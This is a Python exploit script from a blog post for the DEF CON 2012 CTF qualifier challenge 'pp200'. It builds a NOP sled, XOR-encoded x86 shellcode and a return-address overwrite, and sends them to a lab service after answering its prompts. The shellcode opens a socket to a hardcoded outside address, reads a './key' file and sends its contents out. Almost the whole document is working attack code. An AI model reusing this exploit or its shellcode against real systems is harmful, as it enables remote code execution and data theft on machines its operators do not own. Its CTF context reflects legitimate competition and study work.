defcon20 pp200 exploit

2012. 6. 16. 14:08
#!/usr/bin/python2.6
#defcon 2012, pp200 exploit - badcob
 
import socket, sys
from struct import pack
 
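def make_connection(host, port):
    """Open a TCP connection to ``host``:``port`` and return the connected socket.

    The caller owns the returned socket and is responsible for closing it.

    Raises:
        socket.error: if the connect fails.  The half-built socket is closed
            before the error propagates so a failed attempt does not leak a
            descriptor.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
    except socket.error:
        # The caller never sees ``s`` on failure, so release it here.
        s.close()
        raise
    return s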
 
# shellcode
# Author-supplied raw x86 machine code kept as a byte string; it is XOR-encoded
# further down before being sent.  It is opaque here: the repeated "\xcd\x80"
# (int 0x80) sequences show it issues raw system calls, and the pushed ASCII
# fragments "/key" and ".///" suggest it opens a file, but disassemble it
# before trusting any description of what it does.  NOTE(review): the page
# does not state the target OS or architecture — confirm.
scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"
 
# Target service: the author's lab machine (an RFC 1918 private address) and
# the port the vulnerable service listened on.
host = "192.168.74.134"
port = 8912

# Newline-terminated inputs the service expects before the payload.
num = "b74b9d86e6cd3480\n"
user_id = "a6\n"
# Four bytes forming the little-endian value 0xbfbee2bc; they follow the NOP
# sled in the payload.  Presumably the saved return address the overflow
# overwrites — it is specific to the author's target, confirm against the binary.
ret = "".join(chr(b) for b in (0xbc, 0xe2, 0xbe, 0xbf))
 
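# make payload
# Layout: 416-byte NOP sled, shellcode, 17 more NOPs, one 0x0f byte, the
# 4-byte overwrite value, then a terminating newline.  The sizes are the
# author's offsets for this particular binary; the lone 0x0f byte is not
# explained on the page.
temp = "\x90" * 416 + scode + "\x90" * 17 + "\x0f"
temp += ret + "\x0a"

# Every byte is XORed with 0xa6 before it is sent.  NOTE(review): the key
# equals the user id ("a6") sent just before the payload, which suggests the
# service decodes its input with that id — confirm against the binary.
# A byte that encodes to 0x0a would presumably end a line-oriented read early,
# so such a payload is unusable.
payload = ''

for x in temp:
    a = ord(x) ^ 0xa6
    if a == 0xa:
        # Stop here instead of falling through and sending a truncated buffer.
        print("failed")
        sys.exit(1)
    payload += chr(a)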
 
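# Drive the service: answer its two newline-terminated prompts, then deliver
# the encoded payload.  The socket is closed on every exit path.
s = make_connection(host, port)
try:
    s.sendall(num)
    print(s.recv(128))
    s.sendall(user_id)
    print(s.recv(128))
    # sendall() loops until the whole buffer is written; a bare send() may
    # write only a prefix of the 500-plus-byte payload without raising.
    s.sendall(payload)
finally:
    s.close()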
